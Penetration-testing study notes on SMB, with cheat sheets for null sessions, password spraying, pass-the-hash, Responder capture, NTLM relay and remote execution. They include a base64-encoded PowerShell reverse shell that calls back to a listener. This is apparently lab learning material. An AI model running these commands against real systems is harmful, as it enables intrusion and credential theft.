Ports 137, 138, 139, 445 SMB
Server Message Block (SMB) is a client-server protocol that regulates access to files and entire directories and other network resources such as printers, routers, or interfaces released for the network. It runs mainly on Windows, BUT with the free software project Samba, there is also a solution that enables the use of SMB in Linux and Unix distributions and thus cross-platform communication via SMB.
Basically a SMB server provides arbitrary parts of its local file system as shares. Therefore the hierarchy visible to a client is partially independent of the structure on the server.
Samba is an alternative variant to the SMB server, developed for Unix-based operating system. Samba implements the Common Internet File System (CIFS) network protocol. CIFS is a "dialect" of SMB. In other words, CIFS is a very specific implementation of the SMB protocol, which in turn was created by Microsoft. This allows Samba to communicate with newer Windows systems. Therefore, it usually is referred to as SMB / CIFS. However, CIFS is the extension of the SMB protocol. So when we pass SMB commands over Samba to an older NetBIOS service, it usually connects to the Samba server over TCP ports 137, 138, 139, but CIFS uses TCP port 445 only. There are several versions of SMB, including outdated versions that are still used in specific infrastructures. Nowadays, modern Windows operating systems use SMB over TCP but still support the NetBIOS implementation as a failover.
| SMB Version | Supported | Features |
|---|---|---|
| CIFS | Windows NT 4.0 | Communication via NetBIOS interface |
| SMB 1.0 | Windows 2000 | Direct connection via TCP |
| SMB 2.0 | Windows Vista, Windows Server 2008 | Performance upgrades, improved message signing, caching feature |
| SMB 2.1 | Windows 7, Windows Server 2008 R2 | Locking mechanisms |
| SMB 3.0 | Windows 8, Windows Server 2012 | Multichannel connections, end-to-end encryption, remote storage access |
| SMB 3.0.2 | Windows 8.1, Windows Server 2012 R2 | |
| SMB 3.1.1 | Windows 10, Windows Server 2016 | Integrity checking, AES-128 encryption |
- On Windows, SMB can run directly over port 445 TCP/IP without the need for NetBIOS over TCP/IP
- but if Windows has NetBIOS enabled, or we are targetting a non-Windows host, we will find SMB running on port 139 TCP/IP. This means that SMB is running with NetBIOS over TCP/IP.
In a network, each host participates in the same workgroup. A workgroup is a group name that identifies an arbitrary collection of computers and their resources on an SMB network. There can be multiple workgroups on the network at any given time. IBM developed an application programming interface (API) for networking computers called the Network Basic Input/Output System (NetBIOS). The NetBIOS API provided a blueprint for an application to connect and share data with other computers. In a NetBIOS environment, when a machine goes online, it needs a name, which is done through the so-called name registration procedure. Either each host reserves its hostname on the network, or the NetBIOS Name Server (NBNS) is used for this purpose. It also has been enhanced to Windows Internet Name Service (WINS).
Another protocol that is commonly related to SMB is MSRPC (Microsoft Remote Procedure Call). RPC provides an application developer a generic way to execute a procedure (a.k.a. a function) in a local or remote process without having to understand the network protocols used to support the communication,
Footprinting smb
Typical attacks
1. Null attack
# Connect to smb [-L|--list=HOST] : Selecting the targeted host for the connection request.
smbclient -L -N //$ip
# -N: Suppresses the password prompt.
# -L: retrieve a list of available shares on the remote host
Smbclient will attempt to connect to the remote host and check if there is any authentication required. If there is, it will ask you for a password for your local username. If we do not specify a specific username to smbclient when attempting to connect to the remote host, it will just use your local machine's username.
Without parameter -N, password will be prompted. We leave the password field blank, simply hitting Enter to tell the script to move along.
After authenticating, we may obtain access to some typical shared folders, such as:
ADMIN$ - Administrative shares are hidden network shares created by the Windows NT family of operating systems that allow system administrators to have remote access to every disk volume on a network-connected system. These shares may not be permanently deleted but may be disabled.
C$ - Administrative share for the C:\ disk volume. This is where the operating system is hosted.
IPC$ - The inter-process communication share. Used for inter-process communication via named pipes and is not part of the file system.
WorkShares - Custom share.
We will try to connect to each of the shares except for the IPC$ one, which is not valuable for us since it is not browsable as any regular directory would be and does not contain any files that we could use at this stage of our learning experience:
# the use of / and \ might be different if you need to escape some characters
smbclient \\\\$ip\\ADMIN$
2. smb2 security levels
To detect it, run:
Output:
There are three potential results for the message signing:
1. Message signing disabled.
2. Message signing enabled but not required (default for SMB2).
3. Message signing enabled and required.
Options 1 and 2 are vulnerable to SMB relay attacks. Option 3 is the most secure option.
In case 1, attack is similar to the first vuln. In the second case, we can bypass login, leaving in blank the password, but including the user in the request:
smbclient -L \\$ip -U Administrator
# -L: retrieve a list of available shares on the remote host
# -U: user
smbclient -N -L \\$ip
# -N: Suppresses the password prompt.
Important: Sometimes some jugling is needed:
3. Signing enabled but not required
After running a nmap with scripts enabled (nmap -sC -A 10.129.228.98 -Pn -p-), you get this response:
This will allow us to use smbclient share enumeration without the need of providing a password when signing into the shared folder. For that we will use a well known user in Windows: Administrator.
Same thing is possible with rpcclient:
4. Brute force
User enumeration with rpcclient
# Brute forcing user enumeration with rpcclient:
for i in $(seq 500 1100);do rpcclient -N -U "" $ip -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done
Password spraying with crackmapexec
crackmapexec smb $ip -u /folder/userlist.txt -p '<password>' --local-auth --continue-on-success
# --continue-on-success: continue spraying even after a valid password is found. Useful for spraying a single password against a large user list
# --local-auth: if we are targetting a non-domain joined computer, we will need to use the option --local-auth.
Module smb_login in metasploit
With metasploit, use the module: auxiliary/scanner/smb/smb_login
5. Remote Code Execution (RCE) with PsExec, SmbExec, crackMapExec
PsExec is a tool from SysInternals Suite that lets us execute processes on other systems, complete with full interactivity for console applications, without having to install client software manually. It works because it has a Windows service image inside of its executable. It takes this service and deploys it to the admin$ share (by default) on the remote machine. It then uses the DCE/RPC interface over SMB to access the Windows Service Control Manager API. Next, it starts the PSExec service on the remote machine. The PSExec service then creates a named pipe that can send commands to the system.
Alternatives to PsExec from SysInternals: Impacket PsExec, Impacket SMBExec, Impacket atexec (This example executes a command on the target machine through the Task Scheduler service and returns the output of the executed command), CrackMapExec , Metasploit PsExec - Ruby PsExec implementation.
# Connect to a remote machine with a local administrator account
impacket-psexec administrator:'<password>'@$ip
# Connect to a remote machine with a local administrator account
impacket-smbexec administrator:'<password>'@$ip
# Connect to a remote machine with a local administrator account
impacket-atexec administrator:'<password>'@$ip
RCE with crackmapexec:
# If the--exec-method is not defined, CrackMapExec will try to execute the atexec method, if it fails you can try to specify the --exec-method smbexec.
crackmapexec smb $ip -u Administrator -p '<password>' -x 'whoami' --exec-method smbexec
6. Pass the Hash (PtH) with crackmapexec
# Using a hash instead of a password, to authenticate ourselves: Pass the hash attack (PtH)
crackmapexec smb $ip -u <username> -H <hash> -d <DOMAIN>)
7. Forced Authentication Attacks
We can also abuse the SMB protocol by creating a fake SMB Server to capture users' NetNTLM v1/v2 hashes. The most common tool to perform such operations is the Responder. Responder is an LLMNR, NBT-NS, and MDNS poisoner tool with different capabilities, one of them is the possibility to set up fake services, including SMB, to steal NetNTLM v1/v2 hashes.
./Responder.py -I [interface] -w -d
# -I: Set interface
# -w: Start the WPAD rogue proxy server. Default value is False
# -d: Enable answers for DHCP broadcast requests. This option will inject a WPAD server in the DHCP response. Default: False
# In the HTB machine responder:
./Responder.py -I tun0 -w -d
All saved Hashes are located in Responder's logs directory (/usr/share/responder/logs/). We can copy the hash to a file and attempt to crack it using the hashcat module 5600.
8. NTLM relay attack
If we capture the hash but cannot crack it, then we can try a NTLM relay attack with impacket-ntlmrelayx or Responder MultiRelay.py.
Step 1: Set SMB to OFF in our responder configuration file (/etc/responder/Responder.conf).
Step 2: Launch proxy and get SAM database
# impacket-ntlmrelayx will dump the SAM database by default
impacket-ntlmrelayx --no-http-server -smb2support -t $ip
# --no-http-server:
# -smb2support:
# -t: ip target
Step 3: Create a PowerShell reverse shell using https://www.revshells.com/
# Use option to encode it in base 64
powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADIAMgAwAC4AMQAzADMAIgAsADkAMAAwADEAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA
Step 4: Use the captured hash to launch a reverse shell. Commands in impacket-ntlmrelayx can be executed with flag -c.
impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.220.146 -c 'powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADIAMgAwAC4AMQAzADMAIgAsADkAMAAwADEAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA'
Step 5: Finally, launch a listener. Once the victim authenticates to our server, we poison the response and make it execute our command to obtain a reverse shell.
9. SMBGhost
SMBGhost with the CVE-2020-0796.
The vulnerability consisted of a compression mechanism of the version SMB v3.1.1 which made Windows 10 versions 1903 and 1909 vulnerable to attack by an unauthenticated attacker. The vulnerability allowed the attacker to gain remote code execution (RCE) and full access to the remote target system. In simple terms, this is an integer overflow vulnerability in a function of an SMB driver that allows system commands to be overwritten while accessing memory.
POC: https://www.exploit-db.com/exploits/48537
Enumeration
rpcclient
See RPC installation and basic commands.
The rpcclient offers us many different requests with which we can execute specific functions on the SMB server to get information. A list of some of these functions can be found at rpcclient. Most importantly, anonymous access to such services can also lead to the discovery of other users (see list of commands for rpcclient tool, who can be attacked with brute-forcing in the most aggressive case.
Brute forcing user enumeration with rpcclient:
for i in $(seq 500 1100);do rpcclient -N -U "" $ip -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done
Quick cheat sheet:
# Connect to a remote shared folder (same as smbclient in this regard)
rpcclient -U "" $ip
# rpcclient -U'%' $ip
# Server information
srvinfo
# Enumerate all domains that are deployed in the network
enumdomains
# Provides domain, server, and user information of deployed domains.
querydominfo
# Enumerates all available shares.
netshareenumall
# Provides information about a specific share.
netsharegetinfo <share>
# Enumerates all domain users.
enumdomusers
# Provides information about a specific user.
queryuser <RID>
# An example:
# rpcclient $> queryuser 0x3e8
# Provides information about a specific group.
querygroup <ID>
samrdump from impacket
An alternative for user enumeration would be a Python script from Impacket called samrdump.py.
SMBMap
SMBMap tool is widely used and helpful for the enumeration of SMB services. Quick cheat sheet:
# Enumerate network shares and access associated permissions.
smbmap -H $ip
# # Enumerate network shares and access associated permissions with recursivity
smbmap -H $ip -r
# Download a file from a specific share folder
smbmap -H $ip --download "folder\file.txt"
# Upload a file to a specific share folder
smbmap -H $ip --upload originfile.txt "targetfolder\file.txt"
CrackMapExec
CrackMapExec is widely used and helpful for the enumeration of SMB services.
Quick cheat sheet:
# Check if we can access a machine
crackmapexec smb $ip --local-auth -u <username> -p <password> -d <DOMAIN>
# Spraying password technique
crackmapexec smb $ip -u /folder/userlist.txt -p '<password>' --local-auth --continue-on-success
# --continue-on-success: continue spraying even after a valid password is found. Useful for spraying a single password against a large user list
# --local-auth: if we are targetting a non-domain joined computer, we will need to use the option --local-auth.
# Check which machines we can access in a subnet
crackmapexec smb $ip/24 -u <username> -p <password> -d <DOMAIN>
# Get sam: extract hashes from all users authenticated in the machine
crackmapexec smb $ip -u <username> -p <password> -d <DOMAIN> --sam
# Get the ntds.dit, given that your user has permissions
crackmapexec smb $ip -u <username> -p <password> -d <DOMAIN> --ntds
# See shares
crackmapexec smb $ip --local-auth -u <username> -p <password> -d <DOMAIN> --shares
# Enumerate active sessions
crackmapexec smb $ip --local-auth -u <username> -p <password> -d <DOMAIN> --sessions
# Enumerate users of the domain
crackmapexec smb $ip --local-auth -u <username> -p <password> -d <DOMAIN> --users
# Enumerate logged on users
crackmapexec smb $ip --local-auth -u <username> -p <password> -d <DOMAIN> --loggedon-users
# Using a hash instead of a password, to authenticate ourselves: Pass the hash attack (PtH)
crackmapexec smb $ip -u <username> -H <hash> -d <DOMAIN>
# Execute commands with flag -x
crackmapexec smb $ip/24 -u <Administrator> -d . -H <hash> -x whoami
Enum4Linux
Complete cheat sheet. Enum4linux is another utility that supports null sessions, and it utilizes nmblookup, net, rpcclient, and smbclient to automate some common enumeration from SMB targets such as:
Quick cheat sheet:
# Enumerate shares
enum4linux.exe -S $ip
# Enumerate users
enum4linux.exe -U $ip
# Enumerate machine list
enum4linux.exe -M $ip
# Display the password policy in case you need to mount a network authentification attack
enum4linux.exe -enuP $ip
# Specify username to use (default “”)
enum4linux.exe -u $ip
# Specify password to use (default “”)
enum4linux.exe -p $ip
# Also you can use brute force by adding a file
enum4linux.exe -s /usr/share/enum4linux/share-list.txt $ip
# Do a nmblookup (similar to nbtstat)
enum4linux.exe -n $ip
# In the result we see the <20> flag which means there are resources shared
# Enumerates the password policy in the remote system. This is useful to use brute force
enum4linux.exe -P $ip
# Enumerates available shares
enum4linux.exe -s $ip
If you want to run all these commands in one line:
Interacting with SMB using Windows & Linux
Windows
Using the explorer
[WINKEY] + [R] to open the Run dialog box and type the file share location, e.g.: \\$IP$\Finance\
Using cmd
net use n: \\$IP$\Finance
# n: map its content to the drive letter `n`
# Provide user and password
net use n: \\$IP$\Finance /user:plaintext Password123
# how many files the shared folder and its subdirectories contain.
dir n: /a-d /s /b | find /c ":\"
# dir Application
# n: Directory or drive to search
# /a-d /a is the attribute and -d means not directories
# /s Displays files in a specified directory and all subdirectories
# /b Uses bare format (no heading information or summary)
# | find /c ":\\" : count how many files exist in the directory and subdirectories
# Return files that contain string "cred" in the name
dir n:\*cred* /s /b
# Return files that contain string "password" within
findstr /s /i password n:\*.*
Using powershell
# List contents of folder Finance
Get-ChildItem \\$IP$\Finance\
# Connect to a share
New-PSDrive -Name "N" -Root "\\$IP\Finance" -PSProvider "FileSystem"
# To provide a username and password with Powershell, we need to create a PSCredential. It offers a centralized way to manage usernames, passwords, and credentials.
$username = 'plaintext'
$password = 'Password123'
$secpassword = ConvertTo-SecureString $password -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential $username, $secpassword
New-PSDrive -Name "N" -Root "\\$IP\Finance" -PSProvider "FileSystem" -Credential $cred
# Count elements in a folder
(Get-ChildItem -File -Recurse | Measure-Object).Count
# Return files that contain string "cred" in the name
Get-ChildItem -Recurse -Path N:\ -Include *cred* -File
# Return files that contain string "password" within
Get-ChildItem -Recurse -Path N:\ | Select-String "password" -List
Linux
# mount folder
sudo mkdir /mnt/Finance
sudo mount -t cifs -o username=plaintext,password=Password123,domain=. //$IP/Finance /mnt/Finance
# As an alternative, we can use a credential file.
mount -t cifs //$IP/Finance /mnt/Finance -o credentials=/path/credentialfile
# The file credentialfile has to be structured like this:
# username=plaintext
# password=Password123
# domain=.
# Return files that contain string "cred" in the name
find /mnt/Finance/ -name *cred*
# Return files that contain string "password" within
grep -rn /mnt/Finance/ -ie password